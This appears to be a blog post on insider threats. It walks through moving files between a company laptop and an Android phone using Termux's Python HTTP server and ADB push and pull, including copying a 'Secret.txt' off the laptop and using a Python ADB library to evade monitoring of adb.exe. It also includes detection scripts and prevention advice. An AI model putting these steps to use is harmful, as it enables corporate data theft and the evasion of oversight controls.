Bypassing Corporate Restrictions

1nv3nt0r
7 min read · Oct 5, 2024

Internal Threats Companies Face: Unseen Risks

Organizations often issue company laptops with strict security policies to safeguard sensitive data and maintain the integrity of their IT environment. One of the common restrictions is the prohibition of USB devices in the workplace, as these devices are widely recognized as potential conduits for data breaches or malware intrusions. As a result, employees are not allowed to connect USB devices to their laptops or even bring them into the office premises.

However, despite these measures, employees are permitted to carry smartphones — essential tools for communication and personal use. When connected to company-provided laptops, these devices are usually restricted from transferring data to or from the corporate network. On the surface, this seems like an effective solution, making it difficult for anyone to transfer data from external sources to a company laptop or vice-versa.

But here lies an overlooked security loophole: a malicious actor can potentially exploit their Android smartphone as a tool to bypass these restrictions and facilitate unauthorized data transfer.

Enabling Developer Mode on Your Android Smartphone

To leverage advanced functionalities such as USB debugging and other developer features, you first need to enable Developer Mode on your Android device. Here’s a step-by-step guide to get started:

  1. Open the Settings App
    Go to your phone’s home screen and tap on the Settings icon.
  2. Navigate to ‘About Phone’
    Scroll down the settings menu and select About Phone. On some devices, this option may be located under System > About Phone.
  3. Find the ‘Build Number’
    Scroll down to locate the Build Number option. This is typically found towards the bottom of the ‘About Phone’ section.
  4. Tap on the ‘Build Number’ Repeatedly
    Tap on the Build Number 7 times in quick succession. After a few taps, you’ll see a prompt indicating that you are a few steps away from enabling Developer Mode. Continue tapping until the process is complete.
  5. Enter Your Device PIN (if prompted)
    If your device is protected with a PIN, pattern, or password, you will be asked to enter it at this stage.
  6. Developer Mode Enabled
    Once the process is complete, you’ll see a message that says, “You are now a developer!”
  7. Access Developer Options
    Go back to the main Settings menu. You will now see a new menu called Developer Options (typically located near the bottom of the Settings menu or within the System section).
  8. Enable USB Debugging
    • Tap on Developer Options.
    • Scroll down and toggle the switch next to USB Debugging to enable it.

How Malicious Actors Can Transfer Data

Method 1: Using Termux to Transfer Data via a Local Python Server

How a Malicious Actor Can Exploit Mobile Devices to Transfer Data In or Out of a Corporate Laptop

With the growing security measures implemented by organizations, most employees are restricted from using USB devices or external storage on company-provided laptops. While this helps prevent unauthorized data transfers, malicious actors can still exploit other loopholes. One such method involves using a smartphone with the Termux application to host a local Python server and facilitate data transfers. Here’s how this can be done:

Step-by-Step Breakdown:

Download and Set Up Termux
Begin by downloading Termux from the Google Play Store using the following link:
Termux — Play Store.

Prepare the Files for Transfer
Place all the files you wish to transfer onto your laptop in a designated folder on your smartphone. For example, you can use:

  • /sdcard/Download
  • /data/local/tmp

Launch Termux and Navigate to the Desired Directory
Open the Termux application on your smartphone and use the cd command to navigate to the folder where the files are located. For example:

cd /sdcard/Download

Install Python in Termux
To host a local server, Python needs to be installed on your device. Install it using the following command:

pkg install python

Host a Simple Python HTTP Server
After installing Python, start a local HTTP server using the command below:

python -m http.server 8080

This command will host a server on port 8080, making your files accessible over the local network.

Access the Files from Your Company Laptop
On the company-provided laptop, open a web browser and enter the smartphone’s IP address along with the port number (e.g., 8080). The URL should look like:

http://192.168.0.106:8080

Replace 192.168.0.106 with the actual IP address of your smartphone.

Potential Security Bypass
If successful, this method would allow the attacker to access and download the hosted files onto the company laptop. However, this approach might not always work as intended. Many organizations deploy robust security solutions such as Zscaler or other network monitoring tools that restrict access to non-whitelisted IP addresses and websites. In such cases, all network traffic, except for approved domains, is blocked by default, making it challenging for malicious actors to exploit this method.
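From the defender's side, the transfer described in Method 1 leaves two signals in HTTP telemetry: a private peer address that is not a sanctioned server, and the banner that Python's built-in http.server sends. The sketch below is an added example, not part of the original post; the JSON schema, host names, addresses and the approved subnet are assumptions, and the log lines are constructed.

```python
import ipaddress
import json

# Constructed sample telemetry (hypothetical schema): one JSON object per HTTP
# response observed on a managed laptop.
SAMPLE_LOG = """\
{"host": "LT-0142", "dst": "192.168.0.106", "port": 8080, "server": "SimpleHTTP/0.6 Python/3.11.4"}
{"host": "LT-0142", "dst": "10.20.0.15", "port": 443, "server": "nginx"}
{"host": "LT-0077", "dst": "203.0.113.10", "port": 80, "server": "Apache"}
{"host": "LT-0077", "dst": "192.168.43.1", "port": 8000, "server": "SimpleHTTP/0.6 Python/3.12.1"}
{"host": "LT-0031", "dst": "10.20.0.15", "port": 8080, "server": "SimpleHTTP/0.6 Python/3.10.2"}
"""

RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Assumption: subnets that hold sanctioned internal web servers.
APPROVED = [ipaddress.ip_network("10.20.0.0/24")]


def reasons_for(record):
    """Return the reasons this HTTP response looks like an ad hoc file server."""
    ip = ipaddress.ip_address(record["dst"])
    reasons = []
    if any(ip in n for n in RFC1918) and not any(ip in n for n in APPROVED):
        reasons.append("private peer outside approved subnets")
    # python -m http.server identifies itself as "SimpleHTTP/<ver> Python/<ver>".
    if record.get("server", "").startswith("SimpleHTTP/"):
        reasons.append("python http.server banner")
    return reasons


def find_adhoc_file_servers(log_text):
    """Parse JSON-lines telemetry and return (host, peer, reasons) per hit."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        reasons = reasons_for(rec)
        if reasons:
            hits.append((rec["host"], f'{rec["dst"]}:{rec["port"]}', reasons))
    return hits


if __name__ == "__main__":
    for host, peer, reasons in find_adhoc_file_servers(SAMPLE_LOG):
        print(f"{host} -> {peer}: {', '.join(reasons)}")
```

A record that matches both reasons deserves the highest priority; a banner match on an approved server is more likely a developer's test service and can be triaged separately.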

Method 2: Using ADB to Transfer Data between Smartphone and Company Laptop

How a Malicious Actor Can Use ADB (Android Debug Bridge) for Unauthorized Data Transfers

With stringent data security measures in place, companies often limit external device connections to prevent unauthorized data transfers. However, attackers can still exploit advanced tools such as Android Debug Bridge (ADB) to move data between a company-provided laptop and an Android smartphone. This method provides a hidden backdoor for data exfiltration or infiltration using either a USB cable or a wireless ADB connection. Here’s a detailed look at how this can be done:

Step-by-Step Breakdown:

  1. Enable Developer Mode on the Smartphone
    First, enable Developer Mode on your Android smartphone by following the steps provided in the earlier section.
  2. Download and Set Up Platform Tools on the Laptop
    Download the ADB Platform Tools package from the official Android website using the following link:
    Download Platform Tools
  3. Extract the Platform Tools Package
    Extract the downloaded ZIP file to a directory on your laptop. Inside this directory, you will find the adb.exe executable, which will be used to establish the connection.
  4. Connect the Smartphone to the Laptop Using a USB Cable
    Use a USB cable to connect your smartphone to the laptop. Ensure that USB Debugging is enabled on your phone (found under Developer Options).

  5. Verify Device Connection
    Open the command prompt on your laptop, navigate to the directory where adb.exe is located, and run the following command to check if your device is connected:

    adb.exe devices

    You should see your smartphone listed under List of devices attached. If not, make sure USB Debugging is enabled and your phone is set to File Transfer mode.
  6. Using ADB Over Wi-Fi (For Android 11 or Above)
    If you prefer a wireless connection and have a compatible Android version (Android 11 or higher), you can use the following app:
    Wireless ADB — Play Store
    • Launch the app and enable the wireless ADB connection by toggling the switch.
    • Note the IP address displayed in the app.
    • Now, run the following command on your laptop:

    adb.exe connect <IP Address of Your Smartphone>

    Replace <IP Address of Your Smartphone> with the IP shown in the app, e.g., 192.168.1.100:5555.

Pushing Files from the Laptop to the Smartphone

To copy files from your company-provided laptop to your smartphone, use the adb push command, which takes the local (laptop) path first and the path on the device second:

adb.exe push <Path to File on Laptop> <Destination Path on Smartphone>

Example:

adb.exe push D:\Secret.txt /sdcard/Download/

This command will copy the Secret.txt file from the laptop’s D: drive to the Download folder on your smartphone.

Pulling Files from the Smartphone to the Laptop

Similarly, to send files from your smartphone to the laptop, use the adb pull command, which takes the path on the device first and the local (laptop) path second:

adb.exe pull <Path to File on Smartphone> <Destination Path on Laptop>

Example:

adb.exe pull /sdcard/Download/info.txt D:\Information\

This will copy info.txt from the smartphone’s Download folder to the D:\Information directory on the laptop.

Many organizations block the execution of .exe files or implement network security controls that can detect and prevent unauthorized ADB connections. In such cases, malicious actors can leverage a Python-based implementation of ADB, bypassing the need for adb.exe. One such library is available on GitHub:

By using this Python library, attackers can replicate the functionality of ADB without triggering security alerts that are configured to monitor .exe file executions.
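Because a Python ADB client takes adb.exe out of the picture, detection for ADB over TCP can key on the wire protocol instead of the process name or port. The following added example (not from the original post or from any ADB project) checks whether a session's first payload opens with a well-formed ADB message header; the flow tuples, addresses and the 1 MiB length bound are assumptions, and the sample payloads are constructed.

```python
import struct

# An ADB message starts with a 24-byte header of six little-endian uint32
# fields: command, arg0, arg1, data_length, data_check, magic.
HEADER = struct.Struct("<6I")
COMMANDS = {int.from_bytes(tag, "little"): tag.decode()
            for tag in (b"CNXN", b"AUTH", b"OPEN", b"OKAY",
                        b"CLSE", b"WRTE", b"SYNC", b"STLS")}
MAX_DATA = 1024 * 1024  # sanity bound on data_length (assumption for this sketch)


def adb_command(payload):
    """Return the ADB command name if payload opens with a valid header, else None."""
    if len(payload) < HEADER.size:
        return None
    cmd, _arg0, _arg1, length, _check, magic = HEADER.unpack_from(payload)
    # magic must be the bitwise complement of command; this rejects look-alikes.
    if cmd not in COMMANDS or magic != cmd ^ 0xFFFFFFFF or length > MAX_DATA:
        return None
    return COMMANDS[cmd]


def sample_cnxn():
    """Constructed sample: a connect message as the first payload of a session."""
    banner = b"host::\x00"
    cmd = int.from_bytes(b"CNXN", "little")
    return HEADER.pack(cmd, 0x01000001, MAX_DATA, len(banner),
                       sum(banner), cmd ^ 0xFFFFFFFF) + banner


def classify_flows(flows):
    """flows: (src, dst, dst_port, first_payload) tuples. Return the ADB sessions."""
    return [(src, f"{dst}:{port}", name)
            for src, dst, port, payload in flows
            if (name := adb_command(payload))]


# Constructed flows: default port, a non-default port, and plain HTTP on 5555.
SAMPLE_FLOWS = [
    ("10.20.5.14", "192.168.1.100", 5555, sample_cnxn()),
    ("10.20.5.14", "192.168.1.100", 40213, sample_cnxn()),
    ("10.20.5.14", "10.20.0.15", 5555, b"GET / HTTP/1.1\r\nHost: intranet\r\n\r\n"),
]

if __name__ == "__main__":
    for hit in classify_flows(SAMPLE_FLOWS):
        print(hit)
```

This covers only ADB carried over the network; the USB-cable path has to be caught by device-control or endpoint telemetry instead.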

Recommendations to Prevent Unauthorized Data Transfers:

  1. Implement Network and Device Restrictions
    Use Network Access Control (NAC), Mobile Device Management (MDM), and firewall rules to restrict access to corporate networks and block unauthorized devices or connections.
  2. Enforce USB and ADB Security Policies
    Disable USB Debugging on mobile devices, restrict USB ports to charging only and monitor for any ADB connections initiated within the corporate network.
  3. Deploy Endpoint Protection and DLP Solutions
    Utilize Endpoint Detection and Response (EDR) and Data Loss Prevention (DLP) tools to monitor, detect, and block unauthorized file transfers and access attempts.
  4. Adopt Application and URL Whitelisting
    Limit software installations and network access to only approved applications and URLs, and block tools like Termux or untrusted Python libraries that can be used for data exfiltration.
  5. Conduct Employee Training and Awareness
    Educate employees on security best practices, the dangers of unauthorized device connections, and how to recognize internal threats.
  6. Implement Zero Trust and Regular Security Audits
    Adopt a zero-trust approach for continuous verification of device access and regularly conduct security assessments and penetration testing to identify and mitigate vulnerabilities.
